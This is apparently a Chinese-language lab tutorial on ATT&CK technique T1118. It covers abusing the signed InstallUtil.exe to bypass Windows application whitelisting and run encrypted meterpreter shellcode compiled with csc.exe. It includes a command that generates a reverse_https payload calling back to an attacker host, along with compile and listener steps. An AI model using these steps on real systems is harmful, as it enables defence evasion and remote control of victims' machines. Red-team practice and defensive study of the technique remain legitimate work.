0x00 简介
ATT&CK编号: T1118
战术: 防御逃避,执行
平台: Windows
所需权限: 用户
数据源: 进程监视,进程命令行参数
绕过防御: 进程白名单,数字证书验证
InstallUtil 是一个命令行实用程序,它允许通过执行。net 二进制文件中指定的特定安装程序组件来安装和卸载资源。[1] InstallUtil 位于 Windows 系统的。NET 目录中: C:WindowsMicrosoft.NETFrameworkvInstallUtil.exe
和 C:WindowsMicrosoft.NETFramework64vInstallUtil.exe
. InstallUtil.exe 具有 Microsoft 的数字签名。 攻击者可以通过受信的 Windows 实用程序使用 InstallUtil 来代理代码的执行。 通过利用执行由 [System.ComponentModel.RunInstaller(true)]
。[2]修饰的类的二进制文件中的属性,InstallUtil 还可用于来绕过进程白名单。
0x01 环境
攻击机:Kali
受害机:Windows7
依赖环境:http://Microsoft.NET Framework v4.0.30319
0x02 利用过程
用的比较多的是CSC.exe+InstallUtil.exe加载shellcode,流程为:msf生成C#格式shellcode -> 加密shellcode -> 解密并加载shellcode -> csc.exe编译成.jpg文件 -> InstallUtil.exe白名单执行。
1. 常规用法
项目地址:https://github.com/khr0x40sh/WhiteListEvasion.git
生成cs文件
python InstallUtil.py --cs_file temp.cs --exe_name temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443
csc.exe pentestlab.cs
![7070712a17794656089e7d64114f850d.png](https://i-blog.csdnimg.cn/blog_migrate/75f68642b38bafcf91a46b2989b7c107.jpeg)
攻击机打开msf中使用windows/x64/meterpreter/reverse_tcp
设置监听